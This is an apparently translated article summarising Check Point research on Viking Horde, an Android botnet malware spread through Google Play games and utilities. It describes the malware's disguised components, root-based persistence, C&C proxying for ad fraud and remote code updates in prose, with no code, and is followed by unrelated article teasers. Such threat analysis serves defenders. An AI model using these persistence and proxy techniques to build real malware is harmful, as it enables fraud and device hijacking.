Check Point's research team discovered a new Android virus in the Google Play Store and named it Viking Horde. This virus can perform ad fraud, DDoS attacks, send spam, etc. At least 5 apps have passed the virus scan of Google Play. On both rooted and non-rooted devices, Viking Horde creates a botnet that uses proxied IP addresses to disguise ad clicks so the attacker can make money. A botnet is a group of devices controlled by a hacker without the device's users knowing. Depending on the computing power of the device, the "bots" can do a variety of things. The larger the botnet, the more it can do. On rooted devices, Viking Horde is capable of delivering additional malicious payloads, allowing for remote arbitrary code execution, and it also exploits root privileges to make itself difficult to remove. Horde Introduction
The most downloaded app in the Viking Horde series is the Viking Jump app, which has been downloaded 50,000-100,000 times since it was uploaded to Google Play on April 15. In some markets, Viking Jump has even made it to the top of the Google Play free app charts. The oldest application submitted was Wi-Fi Plus, which was submitted on March 29. Other applications included Memory Booster, Parrot Copter, and Simple 2048. All of the apps infected with Viking Horde had low ratings, which the research team speculated might be because users noticed its strange behavior, such as requesting root permissions. The botnet created by the attackers is spread across countries around the world, and the Check Point research team obtained the distribution of its victims through data collected from a C&C server. Source: Check Point Mobile Threat Research Team, May 6, 2016 How Viking Horde works After studying the Viking Horde code and C&C server, the researchers drew a flowchart. 1. The virus is first downloaded from Google Play. When the app launches the game, it installs several components outside the app's directory. The names of these components are disguised as system-related names, such as core.bin, clib.so, android.bin and update.bin. If the device is not rooted, the components will be installed on the SD card, and if it is rooted, they will be installed in root/data. One of these files is used to exchange information between components. The other contains all the generated component names to facilitate other components to access them. 2. Next, the virus will check whether the device is rooted: If so, the virus activates two additional components:
If the device is not rooted, the malware loads the app_exec file as a shared library and calls its functions through JNI (Java Native Interface, which allows Java code to run native binaries). In either case, once the app_exec application is installed, it establishes a TCP connection with the C&C server and begins communicating. The communication includes the following instructions.
3. The next step is to execute the malicious function through an anonymous proxy connection. The C&C server will send a "create_proxy" command with two IP addresses and ports as parameters. These two IP addresses will be used to open two sockets, one for the remote server and one for the remote target. It will then read the data received by the first socket and transmit it to the target host. The virus developer can use this to hide his IP address. Botnet activity Even if the device is not rooted, Viking Horde turns it into a proxy capable of sending and receiving messages. Below is an infected device as seen from the attacker’s C&C server. The remote end is the IP of the proxy, and the socks IP is the IP of the C&C server. The C&C server contains some information about the device, including the OS version, battery status, and GPS coordinates. In this case, the device is located in the United States and the carrier is T-Mobile. Viking C&C Server The botnet is controlled by many C&C servers, each of which manages hundreds of devices. The primary goal of the malware is to hijack the device and use it to simulate clicking on ads on websites to make money. The malware needs a proxy to bypass the anti-fraud mechanism of advertisers. Some user reviews also say the app sends premium text messages, as shown in the screenshot. The botnet can be used for a variety of purposes, including DDoS attacks, sending spam, and delivering viruses. Virus persistence The virus uses several methods to stay on the system. First, the components installed by Viking Horde use system-specific names, making them difficult to locate and remove. If the device is rooted, there are two mechanisms that can be used to prevent deletion: The app_exec component monitors whether the main program exists . If the user uninstalls the main program, app_exec decrypts a component called com.android.security and installs it silently. This component is hidden and executed after the reboot. The watchdog component will install updates for the app_exec component. If app_exec is deleted, watchdog will reinstall it from the update directory. Apparently, some users have also noticed activity like this: Additional components for rooted devices Probably the most dangerous functionality is the update mechanism: app_exec downloads the latest binary from the server and stores it in the /data directory under the name app_exec_update. Watchdog will periodically check if an update file exists and replace app_exec with it. This means that VikingHorde can download a new binary file based on the server's command. The watchdog component will replace the application with it. In this way, any remote code can be downloaded and executed on this device. Appendix 1: app package name
Appendix 2: C&C Server List
Appendix 3: SHA256 of the infected executable
|
<<: Who has been the winner in life in the past few days?
Speaking of the most popular project in 2019, it ...
WeChat Mini Program is an application that users ...
According to statistics and analysis by the China...
[[125262]] For many gamers, this Christmas was a ...
1. First of all, the jade Wenchang Tower has the ...
Application Performance Management (APM) is a sys...
What is the investment cost of Jixi Rubber and Pl...
In a broad sense, all manual interventions around...
The weather in Chengdu has been changing recently...
At the "2017 China OTT Large Screen Marketin...
In nature, there are many kinds of grapes that ar...
On the first working day of 2021, Pinduoduo contr...
After six rounds of beta testing, Apple finally r...
Most of those who make short videos in self-media...
Baidu Aicaigou is a B2B e-commerce platform that ...